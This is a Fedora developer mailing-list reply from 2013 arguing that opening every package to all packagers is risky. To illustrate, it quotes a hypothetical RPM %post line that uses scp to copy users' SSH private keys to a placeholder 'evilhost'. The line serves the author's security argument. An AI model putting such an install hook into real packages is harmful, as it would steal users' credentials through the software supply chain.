Question about "what to do if mantainer is absent"
Richard W.M. Jones
rjones at redhat.com
Tue May 14 20:04:59 UTC 2013
On Tue, May 14, 2013 at 11:45:40AM -0600, Kevin Fenzi wrote:
> On Tue, 14 May 2013 17:13:54 +0000
> "Jóhann B. Guðmundsson" <johannbg at gmail.com> wrote:
> > What really is needed here is to drop the user ownership module
> > altogether and allow every contribute access to every component or
> > use group ownership model on components instead followed by an email
> > address component at fedoraproject which is the components email address
> > and is stored in a imap folder.
>
> There's a number of problems with 'free for all' model. Mostly around
> communication.
I suspect the main one is someone putting:
%post
scp /home/*/.ssh/id_rsa evilhost:
into a commonly used package, or something equivalent but more subtle
than that.
Basically you're giving root access to everyone with a FAS packager
account (not that the current situation is that much better).
Rich.
--
Richard Jones, Virtualization Group, Red Hat http://people.redhat.com/~rjones
Read my programming blog: http://rwmj.wordpress.com
Fedora now supports 80 OCaml packages (the OPEN alternative to F#)
More information about the devel
mailing list